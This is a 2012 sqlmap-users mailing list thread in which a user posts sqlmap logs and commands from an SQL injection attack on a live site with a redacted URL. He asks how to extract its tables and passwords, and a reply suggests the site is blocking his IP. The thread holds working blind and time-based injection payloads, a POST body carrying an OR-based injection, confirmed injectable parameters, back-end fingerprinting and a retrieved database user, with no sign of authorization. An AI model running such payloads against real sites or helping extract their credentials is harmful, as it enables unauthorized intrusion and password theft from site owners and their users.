HI Iago,
The sqlmap error .details as followed :
[13:32:02] [INFO] testing connection to the target url
[13:32:06] [INFO] testing if the url is stable, wait a few seconds
[13:32:11] [INFO] url is stable
[13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic
[13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic
[13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic
[13:32:14] [WARNING] reflective value(s) found and filtering out
[13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable
[13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'
[13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request
[13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request
[13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:33:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:33:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:33:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:33:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:33:41] [INFO] testing 'Oracle AND time-based blind'
[13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive
[13:34:12] [INFO] heuristics detected web page charset 'ascii'
POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
N: command not found
[4]+ Stopped ./sqlmap.py -u "http://XXXp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=
[4]+ Stopped ./sqlmap.py -u "http://XXX" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=
------------------ 原始邮件 ------------------
发件人: "Iago Sousa"<[email protected]>;
发送时间: 2012年6月24日(星期天) 中午12:33
收件人: "Bob"<[email protected]>;
抄送: "sqlmap-users"<[email protected]>;
主题: Re: [sqlmap-users] sqlmap always tell Connection timed out to thetarget url
I think that the site is blocking your ip address.
On Jun 23, 2012 11:09 PM, "Bob" <[email protected]> wrote:
Hi all,
I am use sqlmap to retrieve database
current-user and current-db can workable
retrieve tables ,passwords etc will response time out
Could you tell me what is the problem ? how i can retrieve tables and passwords ?
Thanks
bob
[09:56:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: c_sn
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl
---
[09:56:08] [INFO] testing MySQL
[09:56:08] [INFO] confirming MySQL
[09:56:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
[09:56:08] [INFO] fetching current user
[09:56:08] [INFO] resumed: keyway_db@localhost
current user: 'keyway_db@localhost'
[09:56:08] [INFO] fetching database users privileges
[09:56:08] [INFO] fetching database users
[09:56:08] [INFO] fetching number of database users
[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:56:08] [INFO] retrieved:
[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[10:00:12] [CRITICAL] connection timed out to the target url or proxy
[*] shutting down at 10:00:12
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
------------------------------------------------------------------------------ Monitor your physical, virtual and cloud infrastructure from a single web console. Get in-depth insight into apps, servers, databases, vmware, SAP, cloud infrastructure, etc. Download 30-day Free Trial. Pricing starts from $795 for 25 servers or applications! http://p.sf.net/sfu/zoho_dev2dev_nov
_______________________________________________ sqlmap-users mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/sqlmap-users
